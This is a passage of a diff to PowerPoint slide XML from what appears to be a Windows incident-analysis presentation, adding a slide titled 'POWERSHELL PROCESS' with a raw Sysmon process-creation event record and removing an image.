+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>()))";"1";"5";;"4";"1";"0";"-9223372036854775808";"589779";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:44";;;"Microsoft-Windows-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Sysmon</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"Process Create (rule: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>ProcessCreate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>)";"System.Collections.ObjectModel.ReadOnlyCollection`1[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>System.String</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>]";"System.Collections.Generic.List`1[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>System.Diagnostics.Eventing.Reader.EventProperty</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>]"</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="Nadpis 10">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13FAC93-3D71-450F-A35B-84C6B766BAAD}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -11676,63 +11610,27 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="76135" y="64009"/>
-            <a:ext cx="12039665" cy="438912"/>
+            <a:off x="0" y="142301"/>
+            <a:ext cx="12192000" cy="585926"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="90000"/>
+            <a:noAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>PC6</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="4" name="Obrázek 3">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B5482FB-B45C-453A-84EA-5AB7BF57C0DD}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId2">
-            <a:extLst>
-              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-              </a:ext>
-            </a:extLst>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1771275" y="1897247"/>
-            <a:ext cx="8649450" cy="3063505"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
+              <a:rPr lang="en-US" sz="5400" dirty="0"/>
+              <a:t>POWERSHELL PROCESS</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3749704141"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="704521522"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
